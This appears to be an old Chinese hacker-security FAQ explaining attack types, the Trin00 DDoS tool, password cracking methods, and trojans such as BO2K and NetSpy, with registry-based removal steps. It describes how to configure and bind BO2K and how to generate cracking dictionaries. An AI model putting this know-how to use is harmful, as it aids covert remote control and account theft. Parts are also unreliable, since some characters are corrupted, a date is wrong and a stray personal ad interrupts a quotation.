黑客的定义
什么是黑客?
答:谈到网络安全问题,就没法不谈黑客(Hacker)。翻开1998年..本出版的《新黑客字典》,可以看到上面对黑客的定义是:“喜欢探索软件程序奥秘、并从中增长其个人才干的人。我可不是啊如果做朋友的可以共同讨论啊我的Q929230还是说正题吧他们不像绝大多数电脑使用者,只规规矩矩地了解别人指定了解的范围狭小的部分知识。”
“黑客”大都是程序员,他们对于..作系统和编程语言有着深刻的认识,乐于探索..作系统的奥秘且善于通过探索了解系统中的漏洞及其原因所在,他们恪守这样一条准则:“Never
damage any
system”(永不破坏任何系统)。他们近乎疯狂地钻研更深入的电脑系统知识并乐于与他人共享成果,他们一度是电脑发展史上的英雄,为推动计算机的发展起了重要的作用。那时候,从事黑客活动,就意味着对计算机的潜力进行智力上最大程度的发掘。国际上的著名黑客均强烈支持信息共享论,认为信息、技术和知识都应当被所有人共享,而不能为少数人所垄断。大多数黑客中都具有反社会或反传统的色彩,同时,另外一个特征是十分重视团队的合作精神。
显然,“黑客”一词原来并没有丝毫的贬义成分。直到后来,少数怀着不良的企图,利用非法手段获得的系统访问权去闯入远程机器系统、破坏重要数据,或为了自己的私利而制造麻烦的具有恶意行为特征的人(他们其实是“Crack”)慢慢玷污了“黑客”的名声,“黑客”才逐渐演变成入侵者、破坏者的代名词。
“他们瞄准一台计算机,对它进行控制,然后毁坏它。”——这是1995年美国拍摄第一部有关黑客的电影《战争游戏》中,对“黑客”概念的描述。
虽然现在对黑客的准确定义仍有不同的意见,但是,从信息安全这个角度来说,“黑客”的普遍含意是特指对电脑系统的非法侵入者。多数黑客都痴迷电脑,认为自己在计算机方面的天赋过人,只要自己愿意,就可毫无顾忌地非法闯入某些敏感的信息禁区或者重要网站,以窃取重要的信息资源、篡改网址信息或者删除该网址的全部内容等恶作剧行为作为一种智力的挑战而自我陶醉。
目前黑客已成为一个特殊的社会群体,在欧美等国有不少完全合法的黑客组织,黑客们经常召开黑客技术交流会,97年11月,在纽约就召开了世界黑客大会,与会者达四五千人之众。另一方面,黑客组织在因特网上利用自己的网站上介绍黑客攻击手段、免费提供各种黑客工具软件、出版网上黑客杂志。这使得普通人也很容易下载并学会使用一些简单的黑客手段或工具对网络进行某种程度的攻击,进一步恶化了网络安全环境。
黑客可以分为哪几种类型?
答:黑客通常可以分为以下几种类型:
1.好奇型
他们没有反社会色彩,只是在追求技术上的精进,
只在好奇心驱使下进行一些并无恶意的攻击,以不正当侵入为手段找出网络漏洞,他们在发现了某些内部网络漏洞后,会主动向网络管理员指出或者干脆帮助修补网络错误以防止损失扩大。他们能使更多的网络趋于完善和安全。
2.恶作剧型
闯入他人网站,以篡改、更换网站信息或者删除该网站的全部内容,并在被攻击的网站上公布自己的绰号,以便在技术上寻求刺激,炫耀自己的网络攻击能力。
3.隐密型
喜欢先通过种种手段把自己深深地隐藏起来,然后再以匿名身份从暗处实施主动网络攻击;有时干脆冒充网络合法用户,通过正常渠道侵入网络后再进行攻击。此类黑客大都技术高超、行踪无定,攻击性比较强。
4.定时炸弹型
极具破坏性的一种类型。为了达到个人目的,通过在网络上设置陷阱或事先在生产或网络维护软件内置入逻辑炸弹或后门程序,在特定的时间或特定条件下,根据需要干扰网络正常运行或致使生产线或者网络完全陷入瘫痪状态。
5. 重磅炸弹型
这种黑客凭借高超的黑客技术,利用高技术手段干扰竞争对手的正常商业行为。或者非法闯入军事情报机关的内部网络,干扰军事指挥系统的正常工作,窃取、调阅和篡改有关军事资料,使高度敏感信息泄密,意图制造军事混乱或政治动荡。
黑客有什么样的危害?
答:黑客对于窥视别人在网络上的秘密有着特别的兴趣,如政府和军队的机密、企业的商业秘密及个人隐私等均在他们的双目注视之下。他们的所作所为常常让人们为之瞠目:
1990年4月—1991年5月间,几名荷兰黑客自由进出美国国防部的34个站点如入无人之境,调出了所有包含“武器”、“导弹”等关键词的信息。严重的是,而美国国防部当时竟一无所知。
在1991年的海湾战争中,美国首次将信息战用于实战,但黑客很快就攻击了美国军方的网络系统。同时。黑客们将窃取到的部分美军机密文件提供给了伊拉克。
1996年9月18..,美国中央情报局的网页被一名黑客破坏,“中央情报局”被篡改成“中央愚蠢局” ……
据《今..美国报》报道,黑客每年给全球电脑网络带来的损失估计高达上百亿美元。
为了打击黑客的犯罪活动,美国政府计划成立一个由联邦调查局、中央情报局、司法局和商务部联合组成的特别小组,来保护美国的重要电脑系统不受恐怖分子的攻击。五角大楼筹划组建一个国家安全情报交流小组,以防?.⑸暗缱诱渲楦凼录薄?
二、黑客常用的攻击手段
在高速运行的Internet上,除了机器设备、通讯线路等硬件设施本身的可靠性问题之外,可以说每时每刻都受到潜在人为攻击的威胁,而这种攻击一旦成功,小则文件受损、商业机密泄漏,大至威胁国家安全。以下就是黑客通常都采用几种攻击手段:后门、炸弹攻击、拒绝服务攻击等。
什么是后门程序?
答:当一个训练有素的程序员设计一个功能较复杂的软件时,都习惯于先将整个软件分割为若干模块,然后再对各模块单独设计、调试,而后门则是一个模块的秘密入口。在程序开发期间,后门的存在是为了便于测试、更改和增强模块的功能。当然,程序员一般不会把后门记入软件的说明文档,因此用户通常无法了解后门的存在。
按照正常..作程序,在软件交付用户之前,程序员应该去掉软件模块中的后门,但是,由于程序员的疏忽,或者故意将其留在程序中以便..后可以对此程序进行隐蔽的访问,方便测试或维护已完成的程序等种种原因,实际上并未去掉。
这样,后门就可能被程序的作者所秘密使用,也可能被少数别有用心的人用穷举搜索法发现利用。想想看,如果黑客发现了你的服务器正运行着有后门的软件,结果将会怎样?!
炸弹攻击的原理是什么?
答:炸弹攻击的基本原理是利用特殊工具软件,在短时间内向目标机集中发送大量超出系统接收范围的信息或者….信息,目的在于使对方目标机出现超负荷、网络堵塞等状况,从而造成目标的系统崩溃及拒绝服务。常见的炸弹攻击有邮件炸弹、逻辑炸弹、聊天室炸弹、特洛伊木马、网络监听等。
什么是邮件炸弹?
答:邮件炸弹攻击是各种炸弹攻击中最常见的攻击手段。现在网上的邮件炸弹程序很多,虽然它们的安全性不尽相同,但基本上都能保证攻击者的不被发现。任何一个刚上网的新手利用现成邮件炸弹工具程序,要实现这种攻击都是易如反掌的。
邮件炸弹造成的危害原理是这样的:由于接收邮件信息需要系统来处理,而且邮件的保存也需要一定的空间。所以,因邮件炸弹而导致的巨量邮件会大大加剧网络连接负担、消耗大量的存储空间,甚至溢出文件系统,这将会给Unix、Windows等许多..作系统形成威胁,除了..作系统有崩溃的危险之外,由于大量….邮件集中涌来,将会占用大量的处理器时间与带宽,造成正常用户的访问速度急剧下降。而对于个人的免费邮箱来说,由于其邮箱容量是有限制的,邮件容量一旦超过限定容量(即邮箱被“撑爆”),系统就会拒绝服务。
有矛就会有盾,针对邮件炸弹的泛滥,一些对抗邮件炸弹的“砍信”软件开始应运而生(比如E-mail
Chomper等),这些“砍信”软件可以帮助你快速删除炸弹邮件。而各免费邮箱提供商也通过使用邮件过滤器等措施加强了这方面的防护。如果被攻击者能够及时发现遭受攻击的话,完全可以使用系统提供的邮件过滤器系统来拒绝接收此类邮件,但是,目前对于解决邮件炸弹的困扰还没有万全之策,应以预防为主。
什么是逻辑炸弹?
答:逻辑炸弹是指对计算机程序进行修改,使之在某种特定条件下触发,按某种特殊的方式运行。在不具备触发条件的情况下,逻辑炸弹深藏不露,系统运行情况良好,用户也感觉不到异常之处。但是,触发条件一旦被满足,逻辑炸弹就会“爆炸”。虽然它不能炸毁你的机器,但是可以严重破坏你的计算机里存储的重要数据,导致凝聚了你心血的研究、设计成果毁于一旦,或者自动生产线的瘫痪等严重后果。
什么是聊天室炸弹?
答:在聊天室里也相对容易受到炸弹攻击,不过还好,并不是所有的聊天室都支持炸弹,一般的聊天室炸弹有两种,一种是使用JavaScript编就的,只有在支持JavaScript的聊天室才可以使用它;另外一种炸弹是基于IP原理的,使用时需要知道对方的IP地址或者主机支持扩展邮件的标准。如果主机是Unix的,且支持扩展邮件标准,那么可以使用flash之类的软件去袭击他们,如果知道对方的IP地址,事情就更简单了,使对方的系统过载的软件简直不胜枚举。此外,还有浏览器炸弹和留言本炸弹等。当触发浏览器炸弹的时候,系统会打开无数的窗口,直到耗尽计算机的资源导致死机为止(也称“窗口炸弹”)。
什么是拒绝服务攻击?
答:拒绝服务攻击,也叫分布式D.O.S攻击(Distributed Denial Of
Service)。拒绝服务就是用超出被攻击目标处理能力的海量数据包消耗可用系统,带宽资源,致使网络服务瘫痪的一种攻击手段。它的攻击原理是这样的:攻击者首先通过比较常规的黑客手段侵入并控制某个网站之后,在该网站的服务器上安装并启动一个可由攻击者发出的特殊指令来进行控制的进程。当攻击者把攻击对象的IP地址作为指令下达给这些进程的时候,这些进程就开始对目标主机发起攻击。这种方式集中了成百上千台服务器的带宽能力,对某个特定目标实施攻击,所以威力惊人,在这种悬殊的带宽对比下,被攻击目标的剩余带宽会迅速耗尽,从而导致服务器的瘫痪。当黑客于1999年8月17
..
攻击美国明尼苏达大学的时候就采用了一个典型的拒绝服务攻击工具Trin00,攻击包从被Trin00控制的至少227个主机源源不断地送到明尼苏达大学的服务器,造成其网络严重瘫痪达48小时。在一定时间内,彻底使被攻击的网络丧失正常服务功能,这种攻击手法为
DDoS,即分布式拒绝服务攻击
拒绝服务攻击工具Trin00有何特点?
答: Trin00是一个基于UDP flood的比较成熟攻击软件,运行环境为Unix或NT。
它通过向被攻击目标主机的随机端口发送超出其处理能力的UDP包,
致使被攻击主机的带宽被大量消耗,直至不能提供正常服务甚至崩溃。
Trin00由以下三个模块组成:客户端(如Telnet之类的连接软件)、攻击控制进程(MASTER)、攻击守护进程(NS)
。其中,攻击守护进程NS是具体实施攻击的程序,它一般和攻击控制进程(MASTER)所在主机分离。
黑客先通过主机系统漏洞将大量NS植入有漏洞主机里。当NS运行时,会首先向攻击控制进程(MASTER)所在主机的31335端口发送内容为HELLO的UDP包,随后,攻击守护进程即对端口27444处于检测状态,等待MASTER攻击指令的到来。
MASTER在正确输入默认密码后开始启动,它一方面侦听端口31335,等待攻击守护进程的HELLO包,另一方面侦听端口27665,等待客户端对其的连接。当客户端连接成功并发出指令时,
MASTER所在主机将向攻击守护进程ns所在主机的27444端口传递指令。
当客户端完成了与MASTER所在主机的27665端口的连接后,即开始进入预备攻击控制状态。
你以为自己的密码很安全吗?
答:只要我们需要上网冲浪,那么就少不了一系列的密码:拨号上网需要密码,收取电子邮件需要密码,进入免费电子信箱要密码、进入网络社区也要密码,使用ICQ、OICQ还是离不开密码……众所周知,在Win9X下,我们的用户密码通常被保存为*.pwl文件。而*.pwl文件就安全了吗?不!在网上就可以找到不少可以直接读取*.pwl文件的小工具。另外,拿用于拨号上网的应用软件来说,我们输入的密码虽然显示为“*”号,但也同样有许多工具(比如PwdView)可以看到用“*”号后面隐藏的秘密。再比如说,当黑客通过某种手段知道了你上传网页的FTP密码以后,就可以很轻易地黑掉你的主页。所以说,通常我们密码的安全性并没有我们想象的那么高。
哪几类密码最危险?
答:通常不很安全的密码主要有以下几种:
第一类:使用用户名/帐号作为密码。虽然这种密码很方便记忆,可是其安全几乎为0。因为几乎所有以破解密码为手段的黑客软件,都首先会将用户名作为破解密码的突破口,而破解这种密码的速度极快,这就等于为黑客的入侵提供了敞开着的大门。
第二类:使用用户名/帐号的变换形式作为密码。
将用户名颠倒或者加前后缀作为密码,虽然容易记忆又可以使一部分初级黑客软件一筹莫展。但是,现在已经有专门对付这类密码的黑客软件了。
第三类:使用纪念..作为密码。这种纯数字的密码破解起来几乎没有什么难度可言。
第四类:使用常用的英文单词作为密码。尤其是如果选用的单词是十分偏僻的,那么这种方法远比前几种方法都要安全。但是,对于有较大的字典库的黑客来说,破解它也并不那么太困难。
第五类:使用5位或5位以下的字符作为密码。5位的密码是很不可靠的,而6位密码也不过将破解的时间延长到一周左右。
比较安全的密码首先必须是8位长度,其次必须包括大小写、数字字母,如果有特殊控制符最好,最后就是不要太常见。比如说:d9C&v6Q0这样的密码就是相对比较安全的,如果再坚持每隔几个月更换一次密码,那就更安全了。另外,还要注意最好及时清空自己的临时文件,上网拨号的时候不选择“保存密码”,在浏览网页输入密码的时候不让浏览器记住自己的密码等。
黑客破解密码的穷举法是怎么回事?
答:穷举法对于纯数字密码(比如以出生..期或者电话号码作为密码)有很好的破解效果,但是包含字母的密码不适合这种方式。。穷举法的原理逐一尝试数字密码的所有排列组合,虽然效率最低,但很可靠,所以又有暴力法破解之称。纯数字密码是很不可靠的,为什么呢?
因为即使是完全穷举,6位数字密码的极限也只有100万种,
如果使用密码破解工具NoPassword,在网络畅通的情况下不出一天即可穷举完毕。而即使是使用8位纯数字密码,只要破解时间稍长,也难保安全。
黑客破解密码的字典法是怎么回事?
答:字典法的工作原理是这样的:由于网络用户通常采用某些英文单词或者自己姓名的缩写作为密码,所以就先建立一个包含巨量英语词汇和短语、短句的可能的密码词汇字典(也称“字典档”),然后使用破解软件去一一尝试,如此循环往复,直到找出正确的密码,或者将密码词汇字典里的所有单词试完一遍为止。这种破解密码方法的效率远高于穷举法,因此大多数密码破解软件都支持这种破解方法。
黑客破解密码的猜测法是怎么回事?
答:猜测法依靠的是经验和对目标用户的熟悉程度。现实生活中,很多人的密码就是姓名汉语拼音的缩写和生..的简单组合。甚至还有人用最危险的密码——与用户名相同的密码!这时候,猜测法拥有最高的效率。
什么是特洛伊木马?
答:特洛伊木马是指一个程序表面上在执行一个任务,实际上却在执行另一个任务。黑客的特洛伊木马程序事先已经以某种方式潜入你的机器,并在适当的时候激活,潜伏在后台监视系统的运行,它同一般程序一样,能实现任何软件的任何功能。例如,拷贝、删除文件、格式化硬盘、甚至发电子邮件。典型的特洛伊木马是窃取别人在网络上的帐号和口令,它有时在用户合法的登录前伪造一登录现场,提示用户输入帐号和口令,然后将帐号和口令保存至一个文件中,显示登录错误,退出特洛伊木马程序。用户还以为自己输错了,再试一次时,已经是正常的登录了,用户也就不会有怀疑。其实,特洛伊木马已完成了任务,躲到一边去了。更为恶性的特洛伊木马则会对系统进行全面破坏。
特洛伊木马法最大的缺陷在于,必须先想方设法将木马程序植入到用户的机器中去。这也是为什么建议普通用户不要轻易地执行电子邮件中附带的程序的原因之一,因为特洛伊木马可能就在你的鼠标点击之间悄然潜入到了你的系统之中。
网络监听是怎么回事?
答:网络监听工具本来是提供给管理员的一种监视网络的状态、数据流动情况以及网络上传输的信息的管理工具。当信息以明文的形式在网络上传输时,将网络接口设置在监听模式,便可以源源不断地截获网上传输的信息。网络监听可以在网上的任何一个位置实施,如局域网中的一台主机、网关上或远程网的调制解调器之间等。当黑客成功登录一台网络上的主机并取得这台主机的超级用户权之后,若想尝试登录其它主机,那么使用网络监听将是最快捷有效的方法,它常常能轻易获得用其它方法很难获得的信息。由于它能有效地截获网上的数据,因此也成了网上黑客使用得最多的方法。网络监听有一个前提条件,那就是监听只能物理上的连接属于同一网段的主机。因为不是同一网段的数据包,在网关就被滤掉,无法传入该网段。
总之,网络监听常常被用来获取用户的口令。因为当前网上的数据绝大多数是以明文的形式传输,而且口令通常都很短且容易辨认。当口令被截获,则可以非常容易地登上另一台主机。
三、神秘的黑客工具
Internet上为数不少的黑客网站大都提供各种各样的黑客软件,下面就来了解其中的一些“典型”,并了解应对措施。
必须说明,安全防范与攻击破解是相互依存的,我们初步了解黑客软件的攻击原理和手段,是为了更好地进行黑客防范,其中涉及的黑客手段切勿轻易尝试,否则必将受到国家有关的网络安全法规的惩处,一切后果由使用者自负。
什么是WinNuke,如何清除?
答:WinNuke的工作原理是利用Windows
95的系统漏洞,通过TCP/IP协议向远程机器发送一段可导致OOB错误的信息,使电脑屏幕上出现一个蓝屏及提示:“系统出现异常错误”,按ESC键后又回到原来的状态,或者死机。对策是用写字板或其它的编辑软件建立一个文件名为OOBFIX.REG的文本文件,内容如下:
REGEDIT4 [HKEY_LOCAL_MACHINE\System\ CurrentControlSet \
Services\VxD\MSTCP]
“BSDUrgent”=“0”
启动资源管理器,双击该文件即可。
什么是BO2K?
答:BO2K是黑客组织“死牛崇拜”(Cult Dead
Cow)所开发的曾经令人闻之色变的黑客程序BO1.2版的最新升级版本。
虽然BO2K可以当作一个简单的监视工具,但它主要的目的还是控制远程机器和搜集资料。BO2K的匿名登陆和可恶意控制远程机器的特点,使得它在网络环境里成为一个极其危险的工具。
BO2K既可以通过Email发送,也可以手工安装,安装包括两个部分:客户端和服务器端。
利用客户端程序,能够很轻松地对被控制的电脑进行众多的..作:比如重新启动计算机、锁死系统、获取系统口令,搜索、下载和编辑所有软件和文档,运行任何应用程序、记录键盘输入情况(也就是说可以易如反掌地窃取你的网络登录密码)等等。而且,BO2K不仅可以在Windows
NT上顺畅运行,就连刚问世的Windows 2000也不能幸免。另外,Cult Dead
Cow还在其专为BO2K而设的网站上还提供了一些用于增强BO2K程序功能的插件(Plug-In),其中有一个名为SilkRope2K的插件(158KB),通过它可以非常容易地把BO2K的服务器程序捆绑到任何一个可执行文件上,而这个已经暗藏玄机的可执行文件,除了文件长度变大了130KB左右之外,并无其它任何异样,而这个可执行程序一旦被运行,BO2K服务器程序就会悄然无声地自动安装在对方的电脑之中。就样一来,只要被控制的电脑连上了Internet,哪怕远隔千山万水,黑客都可以像..作自己的电脑一样方便地对对方电脑进行随心所欲的控制。
BO2K的组成与工作原理是怎样的?
答:虽然BO2K可以当作一个简单的监视工具,但它主要的目的还是控制远程机器和搜集资料。BO2K的匿名登陆和可恶意控制远程机器的特点,使得它在网络环境里成为一个极其危险的工具。
BO2K包括服务器端的BO2K.exe、BO2Kcfg.exe和用户端的
BO2Kgui.exe、BO3des.dll、BO_peep.dll。其中,两个服务器端的文件一般是通过Email的方式进行传送,BO2K服务器端的程序大小仅为112KB,非常便于在网络上传输;客户端程序解压后的大小约2.07MB左右,功能非常强悍,由于采用了很简明的图形化界面,略通电脑的人都可以很容易地掌握其使用方法。BO2K既可以通过Email发送,也可以手工安装,安装包括两个部分:客户端和服务器端。在服务器端安装BO2K非常简单。只要执行BO2K的服务器端程序,就完成了安装。这个可执行文件名字最初叫做bo2k.exe
,但可能会被改名(比如更容易迷惑人的Readme.exe)。这个可执行文件的名字是在BO2K客户端安装时,或在BO2K设置向导里指定的。
BO2K的设置向导会指导用户进行以下几方面的设置:包括服务端文件名(可执行文件)、网络协议(TCP或UDP)、端口、加密和密码。这个过程完成后,运行bo2kgui.exe(BO2K图形用户界面),
就可以看见工作区,
工作区包括了服务器的列表(如果你保存了上次的结果)。指定要连接的服务器,开始使用BO。给这个服务器起个名字,输入IP地址和连接的一些信息。指定了服务器后,服务器命令的客户端就出现了。这个窗口里可以使用BO的功能….点个命令,功能就列给你看了,有的命令如文件名和端口还需要设置参数。设置向导允许服务端执行快速安装,使用默认设置,以便立即使用BO2K控制远程机器。通过设置工具手动进行设置,可以管理很多选项,其中很多选项主要是用于防止BO被发现的伪装工作。
设置向导的过程分为以下几个步骤: 1.服务端文件名、2.网络协议(TCP或UDP) 、3.端口
、4.加密方法(XOR或3DES)
、5.密码/加密钥匙。设置向导执行完后,会列出服务器的设置工具,有BO2K的运行状况,控制BO2K,客户端/服务器的通讯协议和程序的隐藏。
BO2K怎样进行自我保护?
答:BO2K提供一个图形化的文件浏览方式,可以方便地修改注册表,所有危险之举已经简化到只需鼠标轻轻一点。对于Windows
NT而言,BO2K的危害性就更为巨大:为进行自我保护,BO2K不仅会自动改变自己的进程名称,而且还能自动建立一个自身进程的副本,以备BO2K被删除后还能够“在烈火中永生”。它自己的文件名后面加上一些随机的空格及字母,所以在Windows下无法删除该文件,只能在纯DOS下删掉。也就是说,一旦服务器感染BO2K就必须停机,才能删除。众所周知,重要的服务器停机会造成多大的损失……BO2k还支持多种网络协议。它可以利用TCP或UDP来传送,还可以用XOR加密算法或更高级的3DES加密算法加密。虽然用3DES算法加密的BO2K也有可能被发现,但现在还没有方法来判断其执行的命令。更为令人担心的是,BO2K可以自由地增加或者去掉网络目录的共享属性,也就是说,一旦BO2K进入公司内部网络服务器,那么整个公司网络上的所有文件就都随时有可能被居心叵测的人所“共享”.
BO2K具体可以对电脑进行哪些远程控制?
答:O2K的服务器端程序一旦被激活,你就成为了BO2K的服务器,从此处于黑客的完全控制之下,
BO2K里共有70多条命令,这些命令用来在服务器上搜集数据和控制服务器,包括在BO2K服务器的电脑上增加目录、删除文件、查看系统中各种可能存在的口令、修改注册表,遥控BO2K服务器的多媒体播放、捕捉等功能。两台计算机建立连接后,选个命令,加上参数(如果需要的话),按
“Send Command”(发送命令),就在选择的服务器上执行该命令,服务器的回应也会在回应窗口中显示出来。
黑客可随时启动和锁死系统、猎取密码、获得系统信息;可在你的计算机上出现系统信息框提示,改变HTTP文件服务器访问;可查看、删除、创建网络共享驱动盘和程序;修改注册表;通过远程来拷贝、删除、改变文件名;解压文件;
可使用DNS服务改变主机名和IP地址;可启动和停止BO2K服务系统;加载和卸装有关插件。下面就是BO2K的一些主要的远程控制手段:
1.搜索动态IP地址
从BO2K客户机向特定的IP地址发送命令即可对BO2K服务器..作。如果BO2K服务器无静态IP地址,BO2K客户机提供命令:在BO2K客户机的图形界面中使用“Ping…”命令,给对方电脑发个数据包看它能否被访问,看其是否已经“中招”;另外还可以设定目标IP如“202.102.87.*”,通过扫描子网列表来查找和监控那些电脑被安装了BO2K服务器、而IP地址又是动态分配的用户的电脑。
2.系统控制和文件管理
通过相应的命令,BO2K可以轻松获取和显示包括当前用户、CPU、内存、Window版
本、驱动器(硬盘)容量及未使用空间等内容BO2K服务器上的相关系统信息。另外可以将BO2K服务器上的击键情况和执行输入的窗口名记录下来。
甚至还可以在BO服务器上开一个对话框来与对方进行对话。BO2K还提供诸如对文件进行查找、拷贝、删除等..作的一系列命令,可在BO2K服务器的硬盘目录中查找目标文件,并能任意增加目录和删除文件、查看和拷贝文件、更改目录名、删除目录等。BO2K还可以任意修改BO2K服务器的注册表,锁住BO2K服务器的电脑,甚至可以控制BO2K服务器的系统重启动。
3.音频及视频控制
通过BO2K客户端可以列出BO2K服务器的视频输入设备。如果存在视频输入设备,既可以将视频和音频信号捕捉成为avi文件,也可以将BO2K服务器屏幕影像捕捉成为位图文件。只要愿意,甚至还可以遥控BO2K服务器的多媒体播放,比如在BO2K服务器上播放一个avi文件等等。
4.网络控制 BO2K提供了网络连接、出口地址、TCP
文件接收、网络使用等命令,可以查看BO2K服务器上所有的域名、网络接口、服务器等内容,并可列出当前共享名、共享驱动器以及共享目录、权限和密码。通过TCP文件传输,还能将BO2K服务器主机连接到一个特定的IP地址和端口并发送特定文件中的内容,或将所接收到的数据保存到特定文件中。
5.进程控制
BO2K可以通过Telnet对话来控制基于文本或DOS的应用程序。可以在BO2K服务器列出当前激活的插件和已存在的插件并加以运行。另外还能在BO2K服务器上运行一个程序。也可以查看当前运行的所有程序并发送命令关闭其中的某个程序。
作为一个功能强悍的黑客程序,BO2K的这些功能颇有些令人不寒而栗:因为如果我们的电脑不慎被BO2K侵入,当我们上网的时候自己的电脑就已经毫无秘密可言了,别说拨号上网的口令和系统加密口令了,就连你的屏幕保护口令黑客也知道的一清二楚。
如何清除BO2K?
答:BO2K的功能虽然十分强悍,但它的工作原理却很简单。我们知道它发生作用的前提是每次在Windows启动时,同时悄悄地在我们的电脑上启动一个服务器程序,黑客通过我们登录因特网时的IP地址,用配套的客户端程序登录到我们的电脑,从而实现远程控制我们电脑的目的。从原理上讲,BO2K和著名的PC
Anywhere一样,是一套简单的远程登录及控制软件工具。既然我们知道了BO2K进行工作的关键在于隐藏了一个会在Windows启动时悄悄执行的服务端程序,那么对付它的最直接有效的方法,就是从我们Windows的启动配置中将自动执行的黑客服务器程序删除掉。
对付BO2K的方法如下:首先检查Windows\system下有没有一个名叫UMGR32~1.EXE的文件;如果是NT系统,则在Winnt\system32目录下检查它是否存在,这个文件的存在往往意味着系统已经被BO2K入侵。但这种方法并不是绝对保险,因为BO2K允许入侵者自行改变这个文件名,较可靠的办法还是检查可疑文件的长度,BO2K服务端的文件大小是114688字节,
如果发现某个文件刚好符合这个长度,可使用EDIT打开它,如果发现“Back
Orifice”字串,那么该系统已经确实无疑地感染了BO2K。
BO2K运行时必须修改注册表,因此我们可根据下面的线索通过注册表编辑器使用“查找”检查自己的系统是否被BO2K入侵。被BO2K修改过的注册表应该包含下列特征:
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\
Windows\CurrentVersion\RunServices]
“UMGR32.EXE”=“C:\\WINDOWS\\
SYSTEM\\UMGR32.EXE”
发现了BO2K的蛛丝马迹后,Windows9x用户可以在纯DOS(而不是DOS窗口)下删除文件名以UMGR32打头的文件(del
umgr*.*),再把它增加的注册表项删掉即可。对于WindowsNT,因为不能进入纯DOS状态,可以先删除它的相关注册表项,然后重启机器再看能否删掉以UMGR32打头的文件。如果这样不行的话,只好用系统软盘引导别的..作系统再做修改了。
另外,如果你已经在使用Windows 98 Second Edition版(即98第2版), BO2K
1.0会因为在隐身时的一个小缺陷,它会导致每次开机时都出现“非法..作”提示而无法在系统中顺利驻留,因此使用Windows98
SE版是暂时免疫BO2K的方法之一(可是这种暂时的优势随时可能会因BO2K新修正版的推出而不复存在)。
什么是KeyboardGhost,如何清除?
答:KeyboardGhost(键盘幽灵)是一个专门记录键盘按键情况的黑客软件,可以运行在Win9x/NT/2000下。它的原理是这样的:Windows系统为了开辟键盘输入的缓冲区,在核心区保留了一定数量的字节,其数据结构形式是队列。KeyboardGhost就是通过直接访问这一队列来记录键盘上输入的一切以星号形式显示的密码窗口中的符号。并在系统根目录下生成一文件名为KG.DAT的隐含文件。对策是启动注册表,将[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\
CurrentVersion\RunService]→KG.EXE这一键值删除,并将文件KG.EXE从Windows\System目录下删除。
同时删除C:\KG.DAT这个文件。
什么是万能钥匙Xkey?
答:万能钥匙Xkey是产自国内的密码查找软件,该软件把词典内容分为“电话号码”、“出生..期”、“姓名字母”、“英文数字”四个部分,在每一部分可以按照需要设置有关参数,以快速地制作出许多破解工具所需要的词典文件。万能钥匙Xkey的
1.1版本还增加了电脑和网络常用英文作为字典文件中的单词。
万能钥匙Xkey可以根据你的设置生成各种类型的口令,下面逐一介绍:
1、电话号码:分为“普通电话”和“数字移动电话或寻呼机”两种,这里可以选择不同位数的号码。
在“词典长度”状态栏可以直观地看到词典的长度。词典的越长,那么生成的时间越长、词典文件也越大。2、出生..期:分为月..、年月、年月..三种,并可选择二位或四位年份和设置年份范围。3、姓名字母:分为姓名声母、姓或英文名、中文姓+名、中文姓+名字声母、中文姓+英文名;在姓氏范围中,你可以直接输入某个姓氏或按照人口频度选择姓氏范围,在“姓氏范围”中,你可以直接输入某个姓氏或调整人口频度。
除此之外,你还可选择加上固定前缀、常用数字和出生..期,姓名换位或使用分隔符。4、英文数字:此项包括有“计算机和网络常用英文(150个)”、其它常用英文(53123个)、常用数字(175个)和其它数字(0-999999)。
在生成词典文件之前,你还可以对词典中的字母进行大小写设定和设定词条宽度,并可以根据不同的系统平台对文本文件的换行符进行设定。在一切设置好后,来到“生成词典”对话框,点击“完成”按钮,弹出“保存词典文件”对话框,设置要保存的词典文件类型为TXT或DIC,然后用鼠标单击“保存”按钮,Xkey就开始为你生成词典了。
什么是NetSpy,如何清除?
答:Netspy是一个运行Win95/98的客户机/服务器模式远程控制软件,由客户程序和服务器程序两部分组成。在最新的Netspy版本中,客户程序通过互连网与安装运行在远程计算机上的服务器程序打交道。实际上可以将其看作一个没有权限控制的增强型FTP服务器。通过NetSpy可以神不知鬼不觉地下载和上载目标机器上的任意文件。并可以执行一些特殊的..作,如:终止远程计算机中运行的程序、在远程计算机上执行程序、关闭远程计算机等。
要想通过NetSpy自由存取别的计算机上的软件,同样必须先在目标计算机上安装NetSpy的服务器。Netspy服务器的安装方法十分简单,只需在目标计算机上运行一次netspy.exe文件即可。NetSpy会自动注册到系统里,以后每次启动Windows95/98时,就会自动启动netspy.exe程序了。这时,只要在别的计算机上执行netmonitor.exe,在菜单里选择添加计算机,输入目标计算机的IP地址或域名地址,就可以连接到目标计算机上进行..作了,使用方法十分简单。Netspy的缺点是不能为具体的机器设置密码,所以说安装了netspy
server的机器一旦上网,有可能被任何安装了NetSpy客户程序的机器所控制。
由于Netspy.exe程序安装后,每次重新启动Windows95/98都会在不为人觉察的情况下自动加载NetSpy,所以它也是一个典型的特洛伊黑客程序:只要设法使欲攻击对象运行一次netspy.exe文件,目标计算机的后门就彻底对外开放了。只要对方的计算机一上网,入侵者就可以神不知鬼不觉地取得它的绝对控制权!
对策是在“开始–运行”里输入REGEDIT.EXE,直接打开注册表,如果在:“HKEY_LOCAL_MACHINE\
Software\
Microsoft\
Windows\CurrentVersion\Run”里如果有类似“netspy”、“C:\windows\system\netspy.exe”等字样,说明NetSpy已经进驻系统。另外一种识别方法是:打开资源管理器,进入Windows下的System子目录,如果发现有NetSpy.exe文件(86.5KB),没说的,中招了!
清除NetSpy的方法是:重新启动计算机,进入DOS状态,在Windows下的System子目录里删掉NetSpy.exe这个文件。再次启动机器,进入Windows的注册表,找到并删除“KEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run”下NetSpy的键值即可。
什么是ProxyThief,如何清除?
答:ProxyThief被安装后,会用NetInspect 对机器的0到9999端口进行扫描,以找出可用的Free
Proxy!端口,
然后通过将你的计算机设置成代理服务器, 达到冒用你的IP上网的目的
。黑客可以通过NetSpy或BO2K这样的工具对ProxyThief进行远程控制。清除方法是运行注册表,查找关键字“ProxyThief”,将所有与之相关的键和键值删除。
什么是“冰河”,如何清除?
答:国产黑客软件“冰河”
